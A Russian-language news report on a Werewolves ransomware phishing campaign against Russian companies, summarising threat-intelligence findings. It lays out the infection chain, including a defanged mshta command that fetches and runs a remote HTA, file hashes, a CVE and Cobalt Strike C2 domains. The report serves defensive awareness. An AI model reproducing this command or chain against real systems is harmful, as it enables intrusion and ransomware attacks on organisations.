Werewolves вновь развернула масштабную атаку на российские компании

Эксперты по кибербезопасности из компании F.A.C.C.T. Threat Intelligence зафиксировали новую волну вредоносных рассылок от известной хакерской группы Werewolves. На этот раз злоумышленники нацелились на российские промышленные предприятия, телекоммуникационные и IT-компании, а также финансовые и страховые организации.

Согласно данным специалистов, вымогатели создали поддельный сайт крупного российского производителя спецтехники, скопировав содержимое оригинального портала с помощью программы HTTrack Website Copier. Затем киберпреступники разослали письма с темами «Досудебная претензия» и «Рекламация», содержащие вредоносные вложения, загружающие Cobalt Strike Beacon.

Атака осуществлялась следующим образом:

1. Жертва открывает вложенный документ «Рекламация.doc» (SHA256: da9e7da207a17076785dbe28d6c7922e81d07e84529f80e7a38265c5316fc8d2), который загружает RTF-документ, эксплуатирующий уязвимость CVE-2017-11882.
2. На устройство загружается HTA (HTML Application): mshta https://iplis[.]ru/laydowngrenade.jpeg -> hxxp://vlasta-s[.]ru/logista.hta.
3. HTA-файл выполняет команду PowerShell, распаковывающую и запускающую шелл-код Cobalt Strike Stager.
4. Stager загружает Cobalt Strike Beacon, конфигурация которого содержит watermark: 987654321 и C&C: poopy[.]aarkhipov[.]ru.

Группировка Werewolves специализируется на вымогательстве денег с помощью версии программы-вымогателя LockBit3 (Black), собранной на основе публично доступного билдера. Жертвам предъявляют требования выкупа в размере от $130 000 до $1 000 000 за расшифровку и приватность данных.

Отличительной чертой группировки является применение техники двойного давления: помимо вымогательства за расшифровку данных, они публикуют информацию о тех, кто отказался платить выкуп, на своем сайте.

В апреле текущего года вымогатели уже проводили массовые рассылки на темы весеннего призыва и досудебных претензий.